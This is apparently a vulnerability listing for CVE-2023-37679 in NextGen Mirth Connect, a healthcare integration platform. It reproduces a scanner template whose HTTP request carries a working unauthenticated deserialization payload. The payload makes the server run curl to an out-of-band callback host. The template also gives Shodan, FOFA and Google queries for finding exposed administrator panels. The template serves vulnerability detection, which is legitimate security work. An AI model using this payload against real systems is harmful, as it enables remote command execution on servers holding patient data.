漏洞描述
Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
CVE-2023-37679: NextGen Mirth Connect - Remote Code Execution
PoC代码[已公开]
id: CVE-2023-37679
info:
name: NextGen Mirth Connect - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
reference:
- https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
- https://nvd.nist.gov/vuln/detail/CVE-2023-37679
- http://mirth.com
- http://nextgen.com
- http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-37679
cwe-id: CWE-77
epss-score: 0.93688
epss-percentile: 0.99843
cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: nextgen
product: mirth_connect
shodan-query:
- title:"mirth connect administrator"
- http.title:"mirth connect administrator"
fofa-query: title="mirth connect administrator"
google-query: intitle:"mirth connect administrator"
tags: packetstorm,cve2023,cve,nextgen,rce
http:
- raw:
- |
GET /api/server/version HTTP/1.1
Host: {{Hostname}}
X-Requested-With: OpenAPI
- |
POST /api/users HTTP/1.1
Host: {{Hostname}}
X-Requested-With: OpenAPI
Content-Type: application/xml
<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>curl</string>
<string>http://{{interactsh-url}}/</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>
matchers:
- type: dsl
dsl:
- 'compare_versions(version, "<4.4.1")'
- 'contains(interactsh_protocol, "dns")'
- 'status_code_1 == 200 && status_code_2 == 500'
condition: and
extractors:
- type: regex
part: body_1
name: version
group: 1
regex:
- '(.*)'
internal: true
# digest: 490a004630440220342a8a5148a8d901d4dfbd104fa6176e9b2db6ad97740584d51b4d978bb80f1202207c1f89423af5c7d2805397dd165888061e3e6d5d70ca95a8583179294f325c81:922c64590222798bb761d5b6d8e72950